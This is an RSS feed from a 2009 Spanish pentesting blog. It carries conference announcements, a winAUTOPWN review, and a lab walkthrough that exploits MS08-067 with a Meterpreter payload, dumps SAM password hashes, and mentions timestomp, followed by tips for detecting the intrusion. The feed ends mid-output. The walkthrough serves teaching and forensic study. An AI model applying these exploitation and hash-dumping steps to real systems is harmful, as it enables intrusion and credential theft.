<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>m313 Security Blog &#187; Pentest</title>
	<atom:link href="http://dmedianero.byethost15.com/blog/category/pentest/feed/" rel="self" type="application/rss+xml" />
	<link>http://dmedianero.byethost15.com/blog</link>
	<description>Diario de un Slacker</description>
	<lastBuildDate>Tue, 10 Nov 2009 21:24:58 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.5</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Rooted CON 2010 &#8211; Call for papers</title>
		<link>http://dmedianero.byethost15.com/blog/2009/10/rooted-con-2010-call-for-papers/</link>
		<comments>http://dmedianero.byethost15.com/blog/2009/10/rooted-con-2010-call-for-papers/#comments</comments>
		<pubDate>Tue, 06 Oct 2009 10:15:02 +0000</pubDate>
		<dc:creator>m313</dc:creator>
				<category><![CDATA[Forensic]]></category>
		<category><![CDATA[Fraude]]></category>
		<category><![CDATA[IDS]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[SSOO]]></category>
		<category><![CDATA[con]]></category>
		<category><![CDATA[conferencia]]></category>
		<category><![CDATA[rooted]]></category>

		<guid isPermaLink="false">http://dmedianero.byethost15.com/blog/?p=461</guid>
		<description><![CDATA[===============================
- Rooted CON 2010 -
C A L L   F O R   P A P E R S
===============================
.: [ INTRO ]
Rooted CON es un Congreso de Seguridad que se celebrará en Madrid
(España) en Marzo de 2010. Nuestro objetivo es promover la seguridad,
ofreciendo charlas altamente técnicas con un enfoque práctico (combinación
de teoría / [...]]]></description>
			<content:encoded><![CDATA[<p>===============================<br />
- Rooted CON 2010 -<br />
C A L L   F O R   P A P E R S<br />
===============================</p>
<p><strong>.: [ INTRO ]</strong></p>
<p>Rooted CON es un Congreso de Seguridad que se celebrará en Madrid<br />
(España) en Marzo de 2010. Nuestro objetivo es promover la seguridad,<br />
ofreciendo charlas altamente técnicas con un enfoque práctico (combinación<br />
de teoría / demo) y neutralidad (aunque apostamos por las empresas y<br />
queremos que éstas participen en el congreso, deberá primar el contenido<br />
técnico y objetivo).</p>
<p>También deseamos que la gente participe, se divierta&#8230; ¡y hasta se<br />
lleve un premio a casa! Por ello, llevaremos a cabo diversos eventos<br />
(aparte de las conferencias), siendo uno de los más importantes el<br />
concurso CTF (&#8221;Capture the flag&#8221;), que contará con importantes premios<br />
en metálico y que ha sido diseñado por ni más ni menos que uno de los<br />
&#8220;Sexy Pandas&#8221; (equipo finalista del tradicional &#8220;Defcon CTF&#8221;).</p>
<p>Y por supuesto si todavía te quedan fuerzas también podrás aprovechar<br />
para vivir a tope el encanto de las noches madrileñas&#8230;</p>
<p><strong>.: [ FORMATO ]</strong></p>
<p>Nos gustaría recibir dos tipos de propuestas:<br />
- charlas rápidas. Duración: 20&#8242;.<br />
- charlas normales. Duración: 50&#8242;.</p>
<p>Si tienes una idea loca/interesante y fresca que se puede contar en<br />
poco tiempo, por favor, no lo dudes y propón una charla rápida. Si tu<br />
idea es más loca todavía y necesitas más tiempo para explicarla en<br />
profundidad usa la segunda modalidad: la charla normal.</p>
<p>Sólo aceptaremos propuestas en español e inglés. Haremos todo lo<br />
posible para tener traducción simultánea en la sala pero no podemos<br />
prometer nada ya que dependerá del presupuesto y de los patrocinadores.</p>
<p><strong>.: [ TEMÁTICA ]</strong></p>
<p>Nos interesa cualquier tema puntero del mercado de la seguridad. Éstos<br />
son sólo algunos ejemplos:<br />
- técnicas innovadoras tanto defensivas como ofensivas.<br />
- todo lo relacionado con el fraude, phishing, troyanos en entornos<br />
financieros, mecanismos de protección asociados, etc.<br />
- &#8220;ingeniería inversa&#8221;, técnicas de bajo nivel, kernel, &#8230;<br />
- descubrimiento de vulnerabilidades, &#8220;fuzzing&#8221; y técnicas relacionadas.<br />
- ataques en entornos virtualizados, sistemas de cluster, &#8220;cloud<br />
computing&#8221; y nuevos productos de seguridad &#8220;en la nube&#8221;.<br />
- criptografía y criptoanálisis.<br />
- seguridad en entornos móviles.<br />
- herramientas de hacking: desarrollos propios.<br />
- seguridad documental.<br />
- voz sobre IP, &#8220;phreaking&#8221;, &#8230;<br />
- análisis forense y contramedidas.<br />
- seguridad en dispositivos inalámbricos.<br />
- esteganografía y todo tipo de canales subliminales.<br />
- seguridad en aplicaciones web.<br />
- &#8230;</p>
<p><strong>.: [ PROCEDIMIENTO PARA PRESENTAR UNA PROPUESTA ]</strong></p>
<p>¿Te gustaría hablar en Rooted CON? ¡No te olvides de hacer las charlas<br />
ilustrativas e incluir demos! <img src='http://dmedianero.byethost15.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Envíanos tu solicitud por correo electrónico a:<br />
cfp -AT- rootedcon.es</p>
<p>Para que tu charla sea aceptada en el proceso inicial de selección<br />
*deberá* respetar el formato descrito previamente e incluir *toda* la<br />
información siguiente:</p>
<p>- título<br />
- autor (nombre completo y opcionalmente nick/apodo)<br />
- bio (unas líneas diciendo quién eres)<br />
- duración (¿charla normal o rápida?)<br />
- resumen (deberá ser lo suficientemente extenso como para poder ser<br />
correctamente evaluado)<br />
- ubicación/nacionalidad<br />
- medios necesarios para impartir la charla<br />
- ¿tienes pensado dar la misma (o similar) charla en otras conferencias?<br />
¿En cuál?</p>
<p><strong>.: [ FECHAS ]</strong></p>
<p>1 Octubre, 2009 &#8211; Se abre el CFP.<br />
20 Diciemebre, 2009 &#8211; Se cierra el CFP.<br />
31 Diciembre, 2009 &#8211; Ponentes seleccionados.<br />
10 Enero, 2010 &#8211; Entrega del &#8220;paper&#8221; final y materiales de la presentación.</p>
<p><strong>.: [ PRIVILEGIOS PARA PONENTES ]</strong></p>
<p>Los ponentes gozarán de los siguientes beneficios:<br />
- Alojamiento gratuito.<br />
- Acceso gratuito al congreso.<br />
- Gastos de viaje (en la medida de lo posible).<br />
- Tickets/bebidas gratis durante la fiesta.</p>
<p><strong>.: [ PATROCINADORES ]</strong></p>
<p>Todavía tienes la oportunidad de ayudarnos a organizar el mejor<br />
congreso de seguridad de España y a la vez obtener un interesante ROI.<br />
Si estás interesado en ser uno de nuestros patrocinadores, por favor<br />
contacta con nosotros:</p>
<p>patrocinio -AT- rootedcon.es</p>
<p><strong>.: [ ENLACES ]</strong></p>
<p>- Sitio Web<br />
<a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5yb290ZWRjb24uZXMv">http://www.rootedcon.es/</a><br />
- Grupo en Facebook<br />
<a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5mYWNlYm9vay5jb20vZ3JvdXAucGhwP2dpZD05NjQxMDkyNDc5OA==">http://www.facebook.com/group.php?gid=96410924798</a><br />
- Grupo en LinkedIn<br />
<a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5saW5rZWRpbi5jb20vZ3JvdXBzP2dpZD0xOTY5NDM4">http://www.linkedin.com/groups?gid=1969438</a><br />
- Lista de correo &#8220;sólo-anuncios&#8221;<br />
<a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cHM6Ly9saXN0YXMucm9vdGVkY29uLmVzL21haWxtYW4vbGlzdGluZm8vcm9vdGVkLWFubm91bmNl">https://listas.rootedcon.es/mailman/listinfo/rooted-announce</a></p>
<p>-=EOF=-</p>
<p class="akst_link"><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8/cD00NjEmYW1wO2Frc3RfYWN0aW9uPXNoYXJlLXRoaXM="  title=\"E-mail this, post to del.icio.us, etc.\" id=\"akst_link_461\" class=\"akst_share_link\" rel=\"nofollow\">Compártelo</a>
</p> <img src="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?view=1&post_id=461" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://dmedianero.byethost15.com/blog/2009/10/rooted-con-2010-call-for-papers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Metasploit Unleashed &#8211; Curso gratuito</title>
		<link>http://dmedianero.byethost15.com/blog/2009/09/metasploit-unleashed-curso-gratuito/</link>
		<comments>http://dmedianero.byethost15.com/blog/2009/09/metasploit-unleashed-curso-gratuito/#comments</comments>
		<pubDate>Tue, 22 Sep 2009 08:37:40 +0000</pubDate>
		<dc:creator>m313</dc:creator>
				<category><![CDATA[Pentest]]></category>
		<category><![CDATA[curso]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[unleashed]]></category>

		<guid isPermaLink="false">http://dmedianero.byethost15.com/blog/?p=452</guid>
		<description><![CDATA[Los chicos de Offensive Security han liberado el mejor curso hasta la fecha sobre Metasploit en su versión online. Este curso es una referencia para cualquier usuario de la herramienta y es de obligada lectura:
http://www.offensive-security.com/metasploit-unleashed/

Compártelo
 ]]></description>
			<content:encoded><![CDATA[<p>Los chicos de <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5vZmZlbnNpdmUtc2VjdXJpdHkuY29t">Offensive Security</a> han liberado el mejor curso hasta la fecha sobre Metasploit en su versión online. Este curso es una referencia para cualquier usuario de la herramienta y es de obligada lectura:</p>
<p><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5vZmZlbnNpdmUtc2VjdXJpdHkuY29tL21ldGFzcGxvaXQtdW5sZWFzaGVkLw==">http://www.offensive-security.com/metasploit-unleashed/</a><br />
<img src="http://www.offensive-security.com/metasploit-unleashed/imgs/msfu-01.jpg" alt="Metasploit Unleashed" /></p>
<p class="akst_link"><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8/cD00NTImYW1wO2Frc3RfYWN0aW9uPXNoYXJlLXRoaXM="  title=\"E-mail this, post to del.icio.us, etc.\" id=\"akst_link_452\" class=\"akst_share_link\" rel=\"nofollow\">Compártelo</a>
</p> <img src="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?view=1&post_id=452" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://dmedianero.byethost15.com/blog/2009/09/metasploit-unleashed-curso-gratuito/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Conferencia ISSA de Seguridad Madrid Mayo 2009</title>
		<link>http://dmedianero.byethost15.com/blog/2009/04/conferencia-issa-de-seguridad-madrid-mayo-2009/</link>
		<comments>http://dmedianero.byethost15.com/blog/2009/04/conferencia-issa-de-seguridad-madrid-mayo-2009/#comments</comments>
		<pubDate>Wed, 15 Apr 2009 21:08:19 +0000</pubDate>
		<dc:creator>m313</dc:creator>
				<category><![CDATA[Pentest]]></category>
		<category><![CDATA[conferencia]]></category>
		<category><![CDATA[issa]]></category>

		<guid isPermaLink="false">http://dmedianero.byethost15.com/blog/?p=367</guid>
		<description><![CDATA[El viernes ocho de Mayo de 2009, ISSA organiza en colaboración del Consejo Superior de Investigaciones Científicas la primera edición de las Conferencias ISSA de Seguridad. La conferencia se celebrará en el edificio del Instituto de Física Aplicada del CSIC.
Programa:
- 18:00 Apertura a cargo de Gonzalo Álvarez Marañón (CSIC)
- 18:05 “Seguridad de Servicios Web de [...]]]></description>
			<content:encoded><![CDATA[<p>El viernes ocho de Mayo de 2009, ISSA organiza en colaboración del Consejo Superior de Investigaciones Científicas la primera edición de las Conferencias ISSA de Seguridad. La conferencia se celebrará en el edificio del Instituto de Física Aplicada del CSIC.</p>
<p><strong>Programa:</strong><br />
- 18:00 Apertura a cargo de Gonzalo Álvarez Marañón (CSIC)<br />
- 18:05 “Seguridad de Servicios Web de Código Abierto” &#8211; Victor Manuel Fernandez (OpenSolaris)<br />
- 19:10 “Retos para la Seguridad de Cloud Computing” &#8211; Oscar Delgado (CSIC)<br />
- 20:00 Descanso<br />
- 20:15 “Métricas y Madurez de Procesos de Seguridad” &#8211; Vicente Aceituno, (ISSA)<br />
- 21:00 Despedida</p>
<p>Dado que el aforo está limitado a 80 plazas recomendamos inscribirse suscribiéndose a la lista de Eventos ISSA enviando un correo a:<br />
eventos-issa+subscribe arroba googlegroups.com</p>
<p>Los inscritos tienen preferencia sobre los no inscritos para acceder a la sala antes de las 17:55</p>
<p>El Instituto de Física Aplicada está en la <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5pZmEuY3NpYy5lcy9Db250YWN0by5hc3B4">Calle Serrano, 144.</a></p>
<p><strong>Para recibir una invitación para los próximos eventos de seguridad organizados por ISSA unos días antes de su anuncio público, lo que da mayores oportunidades de asistir cuando el aforo es limitado, recomendamos suscribirse enviando un correo a:<br />
eventos-issa+subscribe arroba googlegroups.com</strong></p>
<p class="akst_link"><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8/cD0zNjcmYW1wO2Frc3RfYWN0aW9uPXNoYXJlLXRoaXM="  title=\"E-mail this, post to del.icio.us, etc.\" id=\"akst_link_367\" class=\"akst_share_link\" rel=\"nofollow\">Compártelo</a>
</p> <img src="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?view=1&post_id=367" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://dmedianero.byethost15.com/blog/2009/04/conferencia-issa-de-seguridad-madrid-mayo-2009/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>winAUTOPWN: framework de exploits</title>
		<link>http://dmedianero.byethost15.com/blog/2009/04/winautopwn-framework-de-exploits/</link>
		<comments>http://dmedianero.byethost15.com/blog/2009/04/winautopwn-framework-de-exploits/#comments</comments>
		<pubDate>Thu, 02 Apr 2009 16:28:17 +0000</pubDate>
		<dc:creator>m313</dc:creator>
				<category><![CDATA[Pentest]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[winAUTOPWN]]></category>

		<guid isPermaLink="false">http://dmedianero.byethost15.com/blog/?p=359</guid>
		<description><![CDATA[winAUTOPWN es una herramienta que permite atacar automáticamente sistemas Windows. Tiene una gran cantidad de exploits integrados y a diferencia de otras soluciones como Metasploit, Immunity Canvas o Core Impact apenas tiene dependencias.
Funciona en linea de comandos e incluye exploits en perl, php, python y cygwin dlls.
Ejecutarlo es tan simple como lanzar el binario, y [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3dpbmF1dG9wd24uY28ubnIv">winAUTOPWN</a> es una herramienta que permite atacar automáticamente sistemas Windows. Tiene una gran cantidad de exploits integrados y a diferencia de otras soluciones como <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5tZXRhc3Bsb2l0LmNvbS8=">Metasploit</a>, <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5pbW11bml0eXNlYy5jb20vcHJvZHVjdHMtY2FudmFzLnNodG1s">Immunity Canvas</a> o <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5jb3Jlc2VjdXJpdHkuY29tL2NvbnRlbnQvY29yZS1pbXBhY3Qtb3ZlcnZpZXc=">Core Impact</a> apenas tiene dependencias.</p>
<p>Funciona en linea de comandos e incluye exploits en perl, php, python y cygwin dlls.<br />
Ejecutarlo es tan simple como lanzar el binario, y nos va preguntando por datos sobre la víctima:</p>
<p><center><br />
<a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2ltZzEwLmltYWdlc2hhY2sudXMvbXkucGhwP2ltYWdlPXdpbmF1dG9wd24wMS5qcGc=" target=\"_blank\"><img src="http://img10.imageshack.us/img10/7677/winautopwn01.th.jpg" border="0" alt="Free Image Hosting at www.ImageShack.us" /></a><br />
</center></p>
<p>No he trasteado demasiado con la herramienta, aunque la he lanzado sobre la máquina Windows que utilizé de demo en los artículos sobre <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8yMDA5LzAyL21ldGFzcGxvaXQtdXNvLWJhc2ljby15LWVqZWN1Y2lvbi1kZS1leHBsb2l0cy8=">Metasploit</a> y <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8yMDA5LzAzL21ldGFzcGxvaXQtbWV0ZXJwcmV0ZXIv">Meterpreter</a> y no han tenido éxito los exploits sobre las mismas vulnerabilidades (<a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8yMDA4LzEwL21zMDgtMDY3LXJlY29waWxhY2lvbi1kZS1yZWN1cnNvcy8=">ms08-067</a>), tal como puede verse a continuación:</p>
<p><center><br />
<a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2ltZzEwLmltYWdlc2hhY2sudXMvbXkucGhwP2ltYWdlPXdpbmF1dG9wd24wMi5qcGc=" target=\"_blank\"><img src="http://img10.imageshack.us/img10/4026/winautopwn02.th.jpg" border="0" alt="Free Image Hosting at www.ImageShack.us" /></a><br />
</center></p>
<p>La principal ventaja es que se actualiza constantemente y es gratuita.<br />
winAUTOPWN puede descargarse <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3dpbmF1dG9wd24uZXhvZmlyZS5uZXQvd2luQVVUT1BXTi5SQVI=">aqui</a>. La página oficial es la siguiente:</p>
<p><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3dpbmF1dG9wd24uY28ubnIv">http://winautopwn.co.nr/</a></p>
<p class="akst_link"><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8/cD0zNTkmYW1wO2Frc3RfYWN0aW9uPXNoYXJlLXRoaXM="  title=\"E-mail this, post to del.icio.us, etc.\" id=\"akst_link_359\" class=\"akst_share_link\" rel=\"nofollow\">Compártelo</a>
</p> <img src="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?view=1&post_id=359" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://dmedianero.byethost15.com/blog/2009/04/winautopwn-framework-de-exploits/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Metasploit: Meterpreter</title>
		<link>http://dmedianero.byethost15.com/blog/2009/03/metasploit-meterpreter/</link>
		<comments>http://dmedianero.byethost15.com/blog/2009/03/metasploit-meterpreter/#comments</comments>
		<pubDate>Sat, 07 Mar 2009 15:37:11 +0000</pubDate>
		<dc:creator>m313</dc:creator>
				<category><![CDATA[Pentest]]></category>
		<category><![CDATA[hijackfree]]></category>
		<category><![CDATA[listdlls]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[meterpreter]]></category>

		<guid isPermaLink="false">http://dmedianero.byethost15.com/blog/?p=323</guid>
		<description><![CDATA[El meterpreter o meta intérprete es una familia de plugins avanzados para utilizar sobre sistemas Windows comprometidos que tienen como característica fundamental su que todo es cargado en la memoria del sistema sin crear ningún proceso adicional. Además aporta mucha flexibilidad, permitiendo la inyección dinámica de dll&#8217;s.
Todo esto permite realizar los ataques haciendo algo menos [...]]]></description>
			<content:encoded><![CDATA[<p>El meterpreter o meta intérprete es una familia de plugins avanzados para utilizar sobre sistemas Windows comprometidos que tienen como característica fundamental su que todo es cargado en la memoria del sistema sin crear ningún proceso adicional. Además aporta mucha flexibilidad, permitiendo la inyección dinámica de dll&#8217;s.</p>
<p>Todo esto permite realizar los ataques haciendo algo menos de ruido. Hoy vamos a realizar <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8yMDA5LzAyL21ldGFzcGxvaXQtdXNvLWJhc2ljby15LWVqZWN1Y2lvbi1kZS1leHBsb2l0cy8=">la misma intrusión que hace unas semanas</a>, pero utilizando como payload el meterpreter.</p>
<p>En esencia realizar la intrusión es igual, solo hay que seleccionar el payload de la familia meterpreter y en caso necesario modificar las opciones del payload elegido. Para la demo he utilizado una simple shell (<em>windows/meterpreter/bind_tcp</em>). La lista total es la siguiente:</p>
<p><em>msf exploit(ms08_067_netapi) &gt; show payloads</em></p>
<p><em>Compatible payloads<br />
===================</em></p>
<p><em>Name                                            Description<br />
&#8212;-                                            &#8212;&#8212;&#8212;&#8211;<br />
windows/meterpreter/bind_ipv6_tcp               Windows Meterpreter, Bind TCP Stager (IPv6)<br />
windows/meterpreter/bind_nonx_tcp               Windows Meterpreter, Bind TCP Stager (No NX Support)<br />
windows/meterpreter/bind_tcp                    Windows Meterpreter, Bind TCP Stager<br />
windows/meterpreter/reverse_ipv6_tcp            Windows Meterpreter, Reverse TCP Stager (IPv6)<br />
windows/meterpreter/reverse_nonx_tcp            Windows Meterpreter, Reverse TCP Stager (No NX Support)<br />
windows/meterpreter/reverse_ord_tcp             Windows Meterpreter, Reverse Ordinal TCP Stager<br />
windows/meterpreter/reverse_tcp                 Windows Meterpreter, Reverse TCP Stager </em></p>
<p>Esta shell a través del meterpreter tiene las siguientes opciones:</p>
<p><em>msf exploit(ms08_067_netapi) &gt; show options<br />
</em></p>
<p><em>Payload options (windows/meterpreter/bind_tcp):</em></p>
<p><em>Name      Current Setting                                                                     Required  Description<br />
&#8212;-      &#8212;&#8212;&#8212;&#8212;&#8212;                                                                     &#8212;&#8212;&#8211;  &#8212;&#8212;&#8212;&#8211;<br />
DLL       C:/Documents and Settings/m313/Datos de programa/msf32/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload<br />
EXITFUNC  thread                                                                              yes       Exit technique: seh, thread, process<br />
LPORT     4444                                                                                yes       The local port<br />
RHOST     192.168.1.66</em></p>
<p>Como podemos apreciar hay una opción para la dll que se inyectará en el sistema.  Una vez definidas las opciones explotar el sistema no tiene misterio, se aprovecha la vulnerabilidad y se inyecta en memoria la dll correspondiente:</p>
<p><em>msf exploit(ms08_067_netapi) &gt; exploit<br />
[*] Started bind handler<br />
[*] Automatically detecting the target&#8230;<br />
[*] Fingerprint: Windows XP Service Pack 2 &#8211; lang:Spanish<br />
[*] Selected Target: Windows XP SP2 Spanish (NX)<br />
[*] Triggering the vulnerability&#8230;<br />
[*] Transmitting intermediate stager for over-sized stage&#8230;(191 bytes)<br />
[*] Sending stage (2650 bytes)<br />
[*] Sleeping before handling stage&#8230;<br />
[*] Uploading DLL (75787 bytes)&#8230;<br />
[*] Upload completed.<br />
[*] Meterpreter session 2 opened (192.168.1.8:1545 -&gt; 192.168.1.66:4444)</em></p>
<p>Así de sencillo y ya estamos utilizando el meterpreter, sin embargo esto es solo el comienzo. Ahora desde la shell meterpreter tenemos muchas e interesantes opciones a las que accedemos con el caracter <em>?</em>:</p>
<p><em>Core Commands<br />
=============</p>
<p>Command       Description<br />
&#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
?             Help menu<br />
channel       Displays information about active channels<br />
close         Closes a channel<br />
exit          Terminate the meterpreter session<br />
help          Help menu<br />
interact      Interacts with a channel<br />
irb           Drop into irb scripting mode<br />
migrate       Migrate the server to another process<br />
quit          Terminate the meterpreter session<br />
read          Reads data from a channel<br />
run           Executes a meterpreter script<br />
use           Load a one or more meterpreter extensions<br />
write         Writes data to a channel</p>
<p>Stdapi: File system Commands<br />
============================</p>
<p>Command       Description<br />
&#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
cat           Read the contents of a file to the screen<br />
cd            Change directory<br />
download      Download a file or directory<br />
edit          Edit a file<br />
getlwd        Print local working directory<br />
getwd         Print working directory<br />
lcd           Change local working directory<br />
lpwd          Print local working directory<br />
ls            List files<br />
mkdir         Make directory<br />
pwd           Print working directory<br />
rmdir         Remove directory<br />
upload        Upload a file or directory</p>
<p>Stdapi: Networking Commands<br />
===========================</p>
<p>Command       Description<br />
&#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
ipconfig      Display interfaces<br />
portfwd       Forward a local port to a remote service<br />
route         View and modify the routing table</p>
<p>Stdapi: System Commands<br />
=======================</p>
<p>Command       Description<br />
&#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
execute       Execute a command<br />
getpid        Get the current process identifier<br />
getuid        Get the user that the server is running as<br />
kill          Terminate a process<br />
ps            List running processes<br />
reboot        Reboots the remote computer<br />
reg           Modify and interact with the remote registry<br />
rev2self      Calls RevertToSelf() on the remote machine<br />
shutdown      Shuts down the remote computer<br />
sysinfo       Gets information about the remote system, such as OS</p>
<p>Stdapi: User interface Commands<br />
===============================</p>
<p>Command       Description<br />
&#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
idletime      Returns the number of seconds the remote user has been idle<br />
uictl         Control some of the user interface components</p>
<p>Priv: Password database Commands<br />
================================</p>
<p>Command       Description<br />
&#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
hashdump      Dumps the contents of the SAM database</p>
<p>Priv: Timestomp Commands<br />
========================</p>
<p>Command       Description<br />
&#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
timestomp     Manipulate file MACE attributes </em></p>
<p>Hay que resaltar la potencia de comandos para inyectar dll&#8217;s, subir ficheros, ejecutar scripts o uno que me gusta especialmente para migrar el meterpreter a otro proceso (<em>migrate</em>). Esto es especialmente importante si por ejemplo hemos utilizado un exploit contra una aplicación que el usuario pueda cerrar, como por ejemplo el Internet Explorer.</p>
<p>Probaremos uno que es especialmente util, el <em>hashdump </em>que sirve para extraer el contenido de la SAM, tal como podemos ver a continuación:</p>
<p><em>hashdump<br />
Administrador:500:aad3b4b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<br />
Asistente de ayuda2:1000:7634e475b9740af3287b02a6be6eea:6118e99d59982568853cbf98a42f2a:::<br />
Invitado:501:aad3b435b504eeaad3b435b51404ee:31d6c0d16ae931b73c59d7e0c089c0:::<br />
SUPPORT_388945a0:1002:aad35b51404eeaad3b435b51404ee:b7aec7c1c40967c5a965b09510f818e:::<br />
test:1003:aad35b51404eeaad3b435b51404ee:31d6cfe06ae931b73c59d7e0c089c0:::</em></p>
<p>Desde el punto de vista del análisis forense de un sistema comprometido y utilizando el meterpreter tenemos un par de puntos interesantes, desde el punto de vista del atacante la opción <em>timestop</em>, que nos permite manipular los atributos de los ficheros, como el tiempo del ultimo acceso, modificación, etc.</p>
<p>Desde el punto de vita de la víctima hay que destacar que el meterpreter no deja rastro de sí mismo en el dico duro, por lo que es necesario un análisis de la memoria RAM para detectarlo. Lo que sí se puede detectar es la conexión entre las máquinas objetivo y atacante.<br />
Imaginemos que estamos en la máquina comprometida y sospechamos que hemos podido ser víctimas de una intrusión. Una ejecución de un programa para ver los proceso del sistema nos alerta al comprobar que uno de los procesos <em>svchost.exe</em> tiene un número muy elevado de hilos y ocupa un tamaño muy considerable en relación con los demás (He utilizado la herramienta <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5oaWphY2tmcmVlLmNvbS9lbi8=">Hijackfree de a-squared</a> ). La ejecución del comando <em>netstat </em>nos da la pista definitiva sobre la intrusión al desvelarnos la conexión establecida contra el atacante:<br />
<center><br />
<a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2ltZzExLmltYWdlc2hhY2sudXMvbXkucGhwP2ltYWdlPWV4cGxvdGFjaW9uLmpwZw==" target=\"_blank\"><img src="http://img11.imageshack.us/img11/6589/explotacion.th.jpg" border="0" alt="Free Image Hosting at www.ImageShack.us" /></a></p>
<p></center></p>
<p>Como nota adicional comentar que si ejecutamos la herramienta <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3NwYWluL3RlY2huZXQvc3lzaW50ZXJuYWxzL3V0aWxpdGllcy9MaXN0RGxscy5tc3B4">ListDlls de SysInternals</a> sobre el proceso sospechoso nos muestra la dll inyectada por el meterpreter (<em>metsrv.dll</em>), facilmente identificable porque no incorpora información acerca del versionado, tal como podemos apreciar a continuación(la salida está sesgada para su mejor lectura):<br />
<em><br />
C:\Documents and Settings\Administrador\Escritorio>Listdlls.exe -r 1108</p>
<p>ListDLLs v2.25 &#8211; DLL lister for Win9x/NT<br />
Copyright (C) 1997-2004 Mark Russinovich<br />
Sysinternals &#8211; www.sysinternals.com</p>
